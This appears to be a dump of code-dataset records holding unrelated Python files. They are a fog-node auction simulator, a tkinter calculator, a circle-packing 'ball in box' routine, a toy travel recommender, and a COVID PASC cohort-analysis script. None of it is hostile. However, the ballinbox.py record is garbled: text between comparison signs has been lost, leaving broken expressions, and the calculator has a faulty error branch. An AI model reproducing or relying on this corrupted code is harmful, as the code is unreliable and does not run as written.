[(switch1[\"position\"][0]-switch2[\"position\"][0])**2+(switch1[\"position\"][1]-switch2[\"position\"][1])**2 for switch2 in list2]\n switch2 = list2[distances.index(min(distances))]\n switch1[\"parent\"] = switch2\n self.fogNodes = []\n self.services = []\n self.totalUtilityList = []\n self.roundCount = 0;\n\n def getSwitch(self, position, level=0):\n switches = self.switches[level]\n distances = [math.hypot(switch[\"position\"][0]-position[0], switch[\"position\"][1]-position[1]) for switch in switches]\n switch = switches[distances.index(min(distances))]\n return switch\n\n def addNode(self, C, U, position):\n switch = self.getSwitch(position)\n newNode = fog_node.FogNode(index=len(self.fogNodes), C=C, U=U, type=\"Edge\", switch=switch, position=position)\n self.fogNodes.append(newNode)\n\n def addCloud(self, numberOfResources, C, U=0.1, position=[0,0]):\n switch = self.getSwitch(position, level=2)\n for index in range(numberOfResources):\n newNode = fog_node.FogNode(index=len(self.fogNodes), C=C, U=U, type=\"Cloud\", switch=switch, position=position)\n self.fogNodes.append(newNode)\n\n def addService(self, F, R,alpha, w, center, sources, destinations):\n src = [ {\"position\":s, \"switch\": self.getSwitch(s)}for s in sources]\n dst = [ {\"position\":d, \"switch\": self.getSwitch(d)}for d in destinations]\n newService = service.Service(index=len(self.services), F=F, R=R, alpha=alpha, w=w, center=center, sources=src, destinations=dst, simulator=self)\n self.services.append(newService)\n\n def totalUtility(self):\n totalUtility = 0\n for service in self.services:\n if service.node:\n if self.fogNodes[service.node].highestBidder == service.index:\n totalUtility -= service.costs[service.node]\n else:\n totalUtility -= service.R\n return totalUtility\n\n def totalCost(self):\n totalCost = 0\n for service in self.services:\n if service.node:\n if self.fogNodes[service.node].highestBidder == service.index:\n totalCost += service.costs[service.node]\n else:\n totalCost += service.R\n return totalCost\n\n def round(self):\n self.roundCount += 1\n# print('Round {}:'.format(self.roundCount))\n change = False\n for s in self.services:\n change |= s.check()\n self.totalUtilityList.append(self.totalUtility())\n return change\n\n def run(self, nearest=False, random=False):\n self.clear()\n if random or nearest:\n for s in self.services:\n if random:\n s.selectRandom()\n else:\n s.selectNearest()\n else:\n for service in self.services:\n service.initialize()\n while True:\n if not self.round():\n print('Finish')\n break\n\n def clear(self):\n self.totalUtilityList = []\n self.roundCount = 0;\n for node in self.fogNodes:\n node.reset()\n for service in self.services:\n service.reset()\n\n def reset(self):\n self.totalUtilityList = []\n self.roundCount = 0;\n self.fogNodes = []\n self.services = []\n\n def printResults(self):\n print(\"Services:\")\n for service in self.services:\n print(\"#{}\".format(service.index + 1))\n nodeIndex = service.node\n if nodeIndex:\n node = self.fogNodes[nodeIndex]\n print(\"\\tR:{}\".format(service.R))\n print(\"\\tNode #{}-> C:{}, U:{}\".format(nodeIndex, node.C, node.U))\n print(\"\\tprice: {}, r:{}, u:{}\".format(node.highestBid, service.rates[nodeIndex], node.C*node.U/service.F))\n else:\n print(\"\\tNo allocation\")\n\n def plot(self, drawLines=False):\n plt.clf()\n self._drawNetowrkTopolog()\n for node in self.fogNodes:\n position = node.position\n switch = node.switch\n plt.plot(position[0], position[1], 'b*')\n 
#plt.annotate(str(\"{:.2f}\".format(node.C*node.U)),xy=(node.position[0], node.position[1]), ha='center', va='bottom',color='blue')\n plt.plot([switch[\"position\"][0], position[0]], [switch[\"position\"][1], position[1]], 'k.-')\n for s in self.services:\n plt.plot(s.center[0], s.center[1], 'r.')\n if s.node:\n position = self.fogNodes[s.node].position\n plt.plot([position[0], s.center[0]], [position[1], s.center[1]], 'c.-')\n plt.show()\n\n def _drawNetowrkTopolog(self):\n for list, color in zip(self.switches[0:2], ['r', 'g']):\n for switch in list:\n plt.plot([switch[\"position\"][0], switch[\"parent\"][\"position\"][0]], [switch[\"position\"][1], switch[\"parent\"][\"position\"][1]], color + '.-')\n for list, color in zip(self.switches, ['rx', 'gx', 'bx']):\n for switch in list:\n plt.plot(switch[\"position\"][0], switch[\"position\"][1], color)\n\n def plotNetowrkTopolog(self):\n plt.clf()\n self._drawNetowrkTopolog()\n plt.show()\n\n def plotOptimalityEvolution(self):\n plt.plot(range(self.roundCount), self.totalUtilityList, 'g-')\n plt.show()\n","sub_path":"6/simulator/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":7609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"266761523","text":"#BY FRANCISCO ISRAEL CASTILLO GUTIERREZ\r\n\r\nfrom tkinter import*\r\nfrom math import*\r\n\r\n\r\nventana=Tk()\r\nventana.title(\"Calculadora\")\r\nventana.configure(background=\"green\")\r\nventana.geometry(\"392x600\")\r\nfondo = PhotoImage(file=\"descarga.gif\")\r\nlabel1 =Label(ventana, image=fondo).place(x=86, y=0)\r\nbuttom_height=3\r\nbuttom_width=11\r\n\r\n\r\ndef botonclik(num):\r\n global operador\r\n operador=operador+str(num)\r\n entrada_texto.set(operador)\r\n \r\ndef clear():\r\n global operador\r\n operador=(\"\")\r\n entrada_texto.set(\"0\")\r\n \r\ndef operacion():\r\n global operador\r\n try:\r\n opera=str(eval(operador))\r\n except:\r\n clear()\r\n opera(\"ERROR\")\r\n entrada_texto.set(opera)\r\n \r\n\r\n\r\nentrada_texto=StringVar()\r\noperador=\"\"\r\nclear()\r\n\r\nboton0 = Button(ventana, text=\"0\",bg=\"yellow3\", width=buttom_width, height=buttom_height, command=lambda:botonclik(0)).place(x=17, y=190)\r\nboton1 = Button(ventana, text=\"1\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(1)).place(x=107, y=190)\r\nboton2 = Button(ventana, text=\"2\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(2)).place(x=197, y=190)\r\nboton3 = Button(ventana, text=\"3\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(3)).place(x=287, y=190)\r\nboton4 = Button(ventana, text=\"4\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(4)).place(x=17, y=250)\r\nboton5 = Button(ventana, text=\"5\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(5)).place(x=107, y=250)\r\nboton6 = Button(ventana, text=\"6\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(6)).place(x=197, y=250)\r\nboton7 = Button(ventana, text=\"7\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(7)).place(x=287, y=250)\r\nboton8 = Button(ventana, text=\"8\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(8)).place(x=17, y=310)\r\nboton9 = Button(ventana, text=\"9\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(9)).place(x=107, y=310)\r\nboton0 
= Button(ventana, text=\"PI\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"pi\")).place(x=197, y=310)\r\nboton0 = Button(ventana, text=\".\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\".\")).place(x=287, y=310)\r\nboton0 = Button(ventana, text=\"+\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"+\")).place(x=17, y=370)\r\nboton0 = Button(ventana, text=\"-\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"-\")).place(x=107, y=370)\r\nboton0 = Button(ventana, text=\"*\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"*\")).place(x=197, y=370)\r\nboton0 = Button(ventana, text=\"/\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"/\")).place(x=287, y=370)\r\nboton0 = Button(ventana, text=\"Raiz\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"sqrt\")).place(x=17, y=430)\r\nboton0 = Button(ventana, text=\"C\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=clear).place(x=107, y=430)\r\nboton0 = Button(ventana, text=\"EXP\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"**\")).place(x=197, y=430)\r\nboton0 = Button(ventana, text=\"=\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=operacion).place(x=287, y=430)\r\nboton0 = Button(ventana, text=\"(\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"(\")).place(x=17, y=490)\r\nboton0 = Button(ventana, text=\")\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\")\")).place(x=107, y=490)\r\nboton0 = Button(ventana, text=\"%\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"%\")).place(x=197, y=490)\r\nboton0 = Button(ventana, text=\"In\",bg=\"yellow3\",width=buttom_width, height=buttom_height, command=lambda:botonclik(\"log\")).place(x=287, y=490)\r\n\r\nentrada = Entry(ventana, font=(\"arial\",20, \"bold\"),textvariable=entrada_texto, width=23, bd=5, insertwidth=5, bg=\"powder blue\", justify=\"right\").place(x=15,y=80)\r\n\r\ne1 = Label(ventana,text=\"FRANCISCO CASTILLO ITTJ\",font=(\"arial\",8,\"bold\"), width=54,height=2, bg=\"white\", fg=\"black\").place(x=5,y=560)\r\n\r\n\r\nventana.mainloop()\r\n \r\n \r\n \r\n","sub_path":"calculadora1.py","file_name":"calculadora1.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"518402617","text":"import math\nimport copy\ndef ball_in_box(m,blockers):\n x=[]\n y=[]\n circles=[]\n already=[]\n for blocker in blockers:\n if blocker[0] not in x:\n x.append(blocker[0])\n if blocker[1] not in y:\n y.append(blocker[1])\n x.append(-1)\n x.append(1)\n y.append(-1)\n y.append(1)\n x.sort()\n y.sort()\n for j in range(len(y)-1):\n for i in range(len(x)-1):\n running=True\n for box in already:\n if box[0][0]<=x[i] and x[i](lim[-1][1]-lim[0][1]):\n for j0 in range(len(y)):\n if y[j0]>lim[-1][1]:\n add=True\n lim[-1]=(lim[-1][0],y[j0])\n c1=((lim[0][0]+lim[-1][0])/2.0,(lim[0][1]+lim[-1][1])/2.0,min(lim[-1][0]-lim[0][0],lim[-1][1]-lim[0][1])/2.0)\n for blocker in blockers:\n if (blocker[0]-c1[0])**2+(blocker[1]-c1[1])**2lim[-1][0]:\n add=True\n lim[-1]=(x[i0],lim[-1][1])\n c1=((lim[0][0]+lim[-1][0])/2.0,(lim[0][1]+lim[-1][1])/2.0,min(lim[-1][0]-lim[0][0],lim[-1][1]-lim[0][1])/2.0)\n for 
blocker in blockers:\n if (blocker[0]-c1[0])**2+(blocker[1]-c1[1])**2biggest[2]:\n biggestindex=k\n biggest=circles[k]\n circles0.append(circles[biggestindex])\n del circles[biggestindex]\n return circles0","sub_path":"ballinbox.py","file_name":"ballinbox.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"448814139","text":"# Synopsis from Wikipedia.\nLOCATIONS = {\n \"Seattle\": {\n \"attributes\": [\n \"WINTER_SPORTS\",\n \"WATER_SPORTS\",\n \"HIKING\",\n \"SEAFOOD\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Seattle is a seaport city on the west coast of the \"\n \"United States.\",\n \"budget\": 5000\n },\n \"Boston\": {\n \"attributes\": [\n \"SEAFOOD\",\n \"AMERICAN_HISTORY\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Boston is the capital city and most populous \"\n \"municipality of the Commonwealth of Massachusetts \"\n \"in the United States.\",\n \"budget\": 700\n },\n \"Columbus\": {\n \"attributes\": [\n \"COLLEGE_TOWN\",\n \"SPORTS\",\n ],\n \"synopsis\": \"Columbus is the state capital and the most populous \"\n \"city of the U.S. state of Ohio.\",\n \"budget\": 200\n },\n \"Washington DC\": {\n \"attributes\": [\n \"AMERICAN_HISTORY\",\n \"MUSEUMS\",\n \"POLITICS\",\n ],\n \"synopsis\": \"Washington, D.C., the capital of the United States of \"\n \"America and the seat of its three branches of government, \"\n \"has an unparalleled collection of free, public museums, and \"\n \"the lion's share of the nation's most treasured monuments \"\n \"and memorials. The vistas on the National Mall between the \"\n \"Capitol, Washington Monument, White House, and Lincoln Memorial \"\n \"are iconic throughout the world.\",\n \"budget\": 2500\n },\n \"Cuba\": {\n \"attributes\": [\n \"SPANISH\",\n \"HISTORIC\",\n \"TROPICAL\",\n \"CIGARS\",\n \"RUM\",\n \"BEACHES\",\n ],\n \"synopsis\": \"Cuba is the largest Caribbean island, between the Caribbean Sea \"\n \"and the North Atlantic Ocean. It lies 145 km (90 miles) south of Key West, \"\n \"Florida, between the Cayman Islands and the Bahamas, to the west of Haiti, \"\n \"and northwest of Jamaica.\",\n \"budget\": 1000\n },\n}\n\n\ndef main():\n print(\"Welcome to JourneyBoiye\\n\")\n\n # Prompt for basic info.\n name = input(\"Name: \")\n salary = input(\"Salary: \")\n budget = 5000\n age = input(\"Age: \")\n zipCode = input(\"What's your zip-code? \")\n\n likes = input(\"Tell me about yourself and interests: \")\n print()\n\n print(\"Welcome {}!\".format(name))\n print()\n\n print(\"Now, I'm going to ask you where you've been before and what you thought of these places\")\n another = \"\"\n while another != \"NO\":\n loc = input(\"Location: \")\n rating = input(\"Rating (1-5): \")\n comments = input(\"Comments: \")\n another = input(\"Another (NO to quit)? 
\")\n print()\n\n\n print(\"Now enter some commands!\")\n print()\n\n cmd = \"\"\n while cmd != \"QUIT\":\n cmd = input(\"> \").upper()\n if \"HELP\" in cmd:\n print(\"Here's a list of commands:\")\n print(\"\\tFIND or SEARCH to look for new suggestions\")\n print(\"\\tBROWSE to show current suggestions\")\n print(\"\\tSALARY to adjust salary\")\n elif \"SALARY\" in cmd:\n budget = 1000\n elif \"BROWSE\" in cmd or \"SHOW\" in cmd:\n print(\"Recommendations\")\n print()\n suggestions = dict(filter(lambda x: x[1][\"budget\"] == budget, LOCATIONS.items()))\n\n for name, attrs in suggestions.items():\n print(name)\n print(attrs[\"synopsis\"])\n print()\n print(\"Recommended because\\n\")\n\n if budget == 5000:\n print(\"Seafood\")\n print(\"CSE Major\")\n print(\"Large Salary\\n\")\n\n print(\"Here's what Seattle has to offer\")\n for attr in attrs[\"attributes\"]:\n print(attr)\n\n elif budget == 1000:\n print(\"Spanish Culture\")\n print(\"Lower salary\\n\")\n\n print(\"Here's what Cuba has to offer\")\n for attr in attrs[\"attributes\"]:\n print(attr)\n\n print()\n response = input(\"Thoughts on the above? \")\n print(\"Thank you for your input\")\n\n elif \"FIND\" in cmd or \"SEARCH\" in cmd:\n suggestions = dict(filter(lambda x: \"AMERICAN_HISTORY\" in x[1][\"attributes\"], LOCATIONS.items()))\n print(\"Results\")\n print()\n\n for name, attrs in suggestions.items():\n print(\"Here's what {} has to offer\".format(name))\n print(attrs[\"synopsis\"])\n print()\n\n for attr in attrs[\"attributes\"]:\n print(attr)\n print()\n\n print()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"485035893","text":"import os\nimport sys\n\n# for linux env.\nsys.path.insert(0, '..')\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport time\nimport random\nimport pickle\nimport ast\nfrom sklearn.model_selection import KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import roc_auc_score, confusion_matrix, precision_recall_fscore_support\nfrom tqdm import tqdm\nfrom datetime import datetime\nimport functools\nimport seaborn as sns\n\nprint = functools.partial(print, flush=True)\nfrom misc import utils\nfrom lifelines import KaplanMeierFitter, CoxPHFitter, AalenJohansenFitter\nfrom lifelines.statistics import survival_difference_at_fixed_point_in_time_test, proportional_hazard_test, logrank_test\nfrom lifelines.plotting import add_at_risk_counts\nfrom lifelines.utils import k_fold_cross_validation\nfrom PRModels import ml\nimport matplotlib.pyplot as plt\nfrom brokenaxes import brokenaxes\n\n# from mlxtend.preprocessing import TransactionEncoder\n# from mlxtend.frequent_patterns import apriori\nKFOLD = 5\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='process parameters')\n # Input\n parser.add_argument('--dataset', choices=['OneFlorida', 'INSIGHT'], default='INSIGHT',\n help='data bases')\n parser.add_argument('--encode', choices=['elix', 'icd_med'], default='elix',\n help='data encoding')\n parser.add_argument('--population', choices=['positive', 'negative', 'all'], default='positive')\n parser.add_argument('--severity', choices=['all', 'outpatient', \"inpatienticu\",\n 'inpatient', 'icu', 'ventilation', ],\n default='inpatienticu')\n parser.add_argument('--goal', choices=['anypasc', 'allpasc', 'anyorgan', 'allorgan'], default='allpasc')\n 
parser.add_argument(\"--random_seed\", type=int, default=0)\n\n args = parser.parse_args()\n\n # More args\n if args.dataset == 'INSIGHT':\n args.data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-PosOnly.csv'\n # args.data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv'\n # args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-anyPASC.csv'\n # args.processed_data_file = r'output/dataset/INSIGHT/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-elix.csv'\n args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-PosOnly-anyPASC.csv'\n\n elif args.dataset == 'OneFlorida':\n args.data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly.csv'\n # args.data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv'\n # args.processed_data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-anyPASC.csv'\n # args.processed_data_file = r'output/dataset/OneFlorida/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-elix.csv'\n args.processed_data_file = r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-anyPASC.csv'\n else:\n raise ValueError\n\n args.data_dir = r'output/dataset/{}/{}/'.format(args.dataset, args.encode)\n args.out_dir = r'output/factors/{}/{}/'.format(args.dataset, args.encode)\n args.fig_out_dir = r'output/figures/{}/{}/'.format(args.dataset, args.encode)\n\n # args.processed_data_file = r'output/dataset/{}/df_cohorts_covid_4manuNegNoCovidV2_bool_all-PosOnly-{}.csv'.format(\n # args.dataset, args.encode)\n\n if args.random_seed < 0:\n from datetime import datetime\n args.random_seed = int(datetime.now())\n\n # args.save_model_filename = os.path.join(args.output_dir, '_S{}{}'.format(args.random_seed, args.run_model))\n # utils.check_and_mkdir(args.out_dir)\n return args\n\n\ndef read_all_and_dump_covid_positive(data_file):\n # r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv'\n # r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv'\n print('Load data file:', data_file)\n # a_debug = pd.DataFrame({'0':df.columns, '1':df.dtypes})\n df = pd.read_csv(data_file, dtype={'patid': str, 'site': str, 'zip': str}, parse_dates=['index date'])\n df = df.loc[(df['covid'] == 1), :]\n print('df.loc[(df[covid] == 1), :].shape:', df.shape)\n\n df.to_csv(data_file.replace('.csv', '-PosOnly.csv'), index=False)\n print('Dump posOnly file done!:', data_file.replace('.csv', '-PosOnly.csv'))\n return df\n\n\ndef build_incident_pasc_from_all_positive(args, dump=True):\n start_time = time.time()\n print('In build_data_from_all_positive')\n print('Step1: Load Covid positive data file:', args.data_file)\n df = pd.read_csv(args.data_file, dtype={'patid': str, 'site': str, 'zip': str}, parse_dates=['index date'])\n # df = df.drop(columns=['Unnamed: 0.1'])\n # df = df.loc[(df['covid'] == 1), :]\n # df.to_csv(args.data_file.replace('.csv', '-PosOnly.csv'))\n print('df.shape:', df.shape)\n print('Covid Positives:', (df['covid'] == 1).sum(), (df['covid'] == 1).mean())\n print('Covid Negative:', (df['covid'] == 0).sum(), (df['covid'] == 0).mean())\n\n # add number of comorbidity as features\n n_comor = df[[x for x in df.columns if (x.startswith('DX:') or 
x.startswith('MEDICATION:'))]].sum(axis=1)\n n_comor_cols = ['num_Comorbidity=0', 'num_Comorbidity=1', 'num_Comorbidity=2',\n 'num_Comorbidity=3', 'num_Comorbidity=4', 'num_Comorbidity>=5']\n print('len(n_comor > 0)', (n_comor > 0).sum())\n for i in [0, 1, 2, 3, 4, 5]:\n col = n_comor_cols[i]\n print(i, col)\n df[col] = 0\n if i < 5:\n df.loc[n_comor == i, col] = 1\n else:\n df.loc[n_comor >= 5, col] = 1\n print('After add number of comorbidities df.shape:', df.shape)\n\n # add selected incident PASC flag\n print('Step2: add selected incident PASC flag and time 2 event')\n df_pasc_info = pd.read_excel('output/causal_effects_specific_withMedication_v3.xlsx', sheet_name='diagnosis')\n selected_pasc_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'pasc']\n print('len(selected_pasc_list)', len(selected_pasc_list))\n print(selected_pasc_list)\n\n selected_organ_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'Organ Domain'].unique()\n print('len(selected_organ_list)', len(selected_organ_list))\n print(selected_organ_list)\n organ_pasc = {}\n for i, organ in enumerate(selected_organ_list):\n pascs = df_pasc_info.loc[\n (df_pasc_info['selected'] == 1) & (df_pasc_info['Organ Domain'] == organ), 'pasc'].tolist()\n organ_pasc[organ] = pascs\n print(i, organ, '-->', len(pascs), ':', pascs)\n\n print('selected PASC and organ domain done!')\n\n exclude_DX_list = {\n 'Neurocognitive disorders': ['DX: Dementia'],\n 'Diabetes mellitus with complication': ['DX: Diabetes Type 2'],\n 'Chronic obstructive pulmonary disease and bronchiectasis': ['DX: Chronic Pulmonary Disorders', 'DX: COPD'],\n 'Circulatory signs and symptoms': ['DX: Arrythmia'],\n 'Anemia': ['DX: Anemia'],\n 'Heart failure': [\"DX: Congestive Heart Failure\"]\n }\n\n print('Labeling INCIDENT pasc in {0,1}')\n # flag@pascname for incidence label, dx-t2e@pascname for original shared t2e\n for pasc in selected_pasc_list:\n flag = df['dx-out@' + pasc] - df['dx-base@' + pasc]\n if pasc in exclude_DX_list:\n ex_DX_list = exclude_DX_list[pasc]\n print(pasc, 'further exclude', ex_DX_list)\n for ex_DX in ex_DX_list:\n flag -= df[ex_DX]\n\n df['flag@' + pasc] = (flag > 0).astype('int')\n\n def _debug_person(pid):\n _person = pd.DataFrame(data={'dx-base': df.loc[pid, ['dx-base@' + x for x in selected_pasc_list]].tolist(),\n 'dx-out': df.loc[pid, ['dx-out@' + x for x in selected_pasc_list]].tolist(),\n 'dx-t2e': df.loc[pid, ['dx-t2e@' + x for x in selected_pasc_list]].tolist()},\n index=selected_pasc_list)\n return _person\n\n # build flag, t2e for any pasc\n # flag@pascname for incidence label, dx-t2e@pascname for t2e which is shared from original data\n print('Any PASC: build flag, t2e for any pasc')\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n n_pasc_series = df[specific_pasc_col].sum(axis=1)\n df['pasc-count'] = n_pasc_series # number of incident pascs of this person\n df['pasc-flag'] = (n_pasc_series > 0).astype('int') # indicator of any incident pasc of this person\n df['pasc-min-t2e'] = 180\n\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n npasc = rows['pasc-count']\n if npasc >= 1:\n # if there are any incident pasc, t2e of any pasc is the earliest time of incident pasc\n pasc_flag_cols = list(rows[specific_pasc_col][rows[specific_pasc_col] > 0].index)\n pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n t2e = rows.loc[pasc_t2e_cols].min()\n else:\n # if no incident pasc, t2e of any pasc: event, death, censoring, 180 days followup, whichever came first.\n # no event, 
only consider death, censoring, 180 days,\n # 1. approximated by the maximum-t2e of any selected pasc .\n # unless all selected pasc happened, but not incident, this not happened in our data.\n # 2. directly follow the definition. Because I also stored max-followup information\n # t2e = rows.loc[['dx-t2e@' + x for x in selected_pasc_list]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'pasc-min-t2e'] = t2e\n\n # build flag, t2e for each organ\n print('Organ category: build flag, t2e for Organ category with a list of pascs')\n for organ in selected_organ_list:\n pascs = organ_pasc[organ]\n pascs_col = ['flag@' + x for x in pascs]\n organ_series = df[pascs_col].sum(axis=1)\n df['organ-count@' + organ] = organ_series\n df['organ-flag@' + organ] = (organ_series > 0).astype('int')\n df['organ-t2e@' + organ] = 180\n\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n for organ in selected_organ_list:\n npasc = rows['organ-count@' + organ]\n pascs_col = ['flag@' + x for x in organ_pasc[organ]]\n if npasc >= 1:\n pasc_flag_cols = list(rows[pascs_col][rows[pascs_col] > 0].index)\n pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n t2e = rows.loc[pasc_t2e_cols].min()\n else:\n # t2e = rows.loc[['dx-t2e@' + x for x in organ_pasc[organ]]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-t2e@' + organ] = t2e\n\n print('Any Organ: build flag, t2e for any organ')\n specific_organ_col = [x for x in df.columns if x.startswith('organ-flag@')]\n n_organ_series = df[specific_organ_col].sum(axis=1)\n df['organ-count'] = n_organ_series\n df['organ-flag'] = (n_organ_series > 0).astype('int')\n df['organ-min-t2e'] = 180\n # b_debug = df[['pasc-count', 'pasc-flag', 'pasc-min-t2e', 'organ-count', 'organ-flag', 'organ-min-t2e']]\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n norgan = rows['organ-count']\n if norgan >= 1:\n organ_flag_cols = list(rows[specific_organ_col][rows[specific_organ_col] > 0].index)\n organ_t2e_cols = [x.replace('organ-flag@', 'organ-t2e@') for x in organ_flag_cols]\n t2e = rows.loc[organ_t2e_cols].min()\n else:\n # t2e: event, death, censoring , 180, whichever came first.\n # no t2e, only consider death and censoring, which were considered by the maximum-t2e of any selected pasc\n # t2e = rows.loc[['organ-t2e@' + x for x in selected_organ_list]].max()\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-min-t2e'] = t2e\n\n print('Add selected incident PASC, any pasc, organ system, flag done!')\n\n if dump:\n utils.check_and_mkdir(args.processed_data_file)\n df.to_csv(args.processed_data_file, index=False)\n print('Dump to:', args.processed_data_file)\n\n print('build_data_from_all_positive Done! 
Total Time used:',\n time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n\n return df, df_pasc_info\n\n\ndef distribution_statistics(args, df, df_pasc_info):\n print(\"df.shape\", df.shape)\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n # pasc_person_counts = df[specific_pasc_col].sum().reset_index().rename(columns={'index': \"pasc\", 0: \"count\"})\n pasc_person_counts = pd.DataFrame({'count': df[specific_pasc_col].sum(),\n 'mean': df[specific_pasc_col].mean(),\n 'per1k': df[specific_pasc_col].mean() * 1000}).reset_index().rename(\n columns={'index': \"pasc\"})\n\n pasc_person_counts['pasc'] = pasc_person_counts['pasc'].apply(lambda x: x.split(\"@\")[-1])\n df_selected_pasc = df_pasc_info.loc[df_pasc_info['selected'] == 1, :]\n df_pasc_person_counts = pd.merge(pasc_person_counts,\n df_selected_pasc[['i', 'pasc', 'PASC Name Simple', 'Notes',\n 'selected', 'Organ Domain', 'Original CCSR Domain']],\n left_on='pasc', right_on='pasc', how='left')\n\n out_dir = r'output/dataset/{}/stats/'.format(args.dataset)\n utils.check_and_mkdir(out_dir)\n df_pasc_person_counts.to_csv(out_dir + 'pasc_person_counts_{}.csv'.format(args.dataset))\n df_person_pasc_counts = df['pasc-count'].rename(\"count\")\n df_person_pasc_counts.to_csv(out_dir + 'person_pasc_counts_{}.csv'.format(args.dataset))\n return df_pasc_person_counts, df_person_pasc_counts\n\n\ndef collect_feature_columns_4_risk_analysis(args, df):\n col_names = []\n if args.severity == 'all':\n # col_names += ['hospitalized', 'ventilation', 'criticalcare']\n col_names += ['not hospitalized', 'hospitalized', 'icu']\n\n # col_names += ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75-<85 years', '85+ years']\n col_names += ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years']\n\n # col_names += ['Female', 'Male', 'Other/Missing']\n col_names += ['Female', 'Male']\n\n # col_names += ['Asian', 'Black or African American', 'White', 'Other', 'Missing']\n col_names += ['Asian', 'Black or African American', 'White', 'Other']\n\n # col_names += ['Hispanic: Yes', 'Hispanic: No', 'Hispanic: Other/Missing']\n col_names += ['Hispanic: Yes', 'Hispanic: No', 'Hispanic: Other/Missing']\n\n # col_names += ['inpatient visits 0', 'inpatient visits 1-2', 'inpatient visits 3-4', 'inpatient visits >=5',\n # 'outpatient visits 0', 'outpatient visits 1-2', 'outpatient visits 3-4', 'outpatient visits >=5',\n # 'emergency visits 0', 'emergency visits 1-2', 'emergency visits 3-4', 'emergency visits >=5']\n col_names += ['inpatient visits 0', 'inpatient visits 1-4', 'inpatient visits >=5',\n 'emergency visits 0', 'emergency visits 1-4', 'emergency visits >=5']\n\n # col_names += ['ADI1-9', 'ADI10-19', 'ADI20-29', 'ADI30-39', 'ADI40-49', 'ADI50-59', 'ADI60-69', 'ADI70-79',\n # 'ADI80-89', 'ADI90-100']\n col_names += ['ADI1-19', 'ADI20-39', 'ADI40-59', 'ADI60-79', 'ADI80-100']\n\n col_names += ['BMI: <18.5 under weight', 'BMI: 18.5-<25 normal weight', 'BMI: 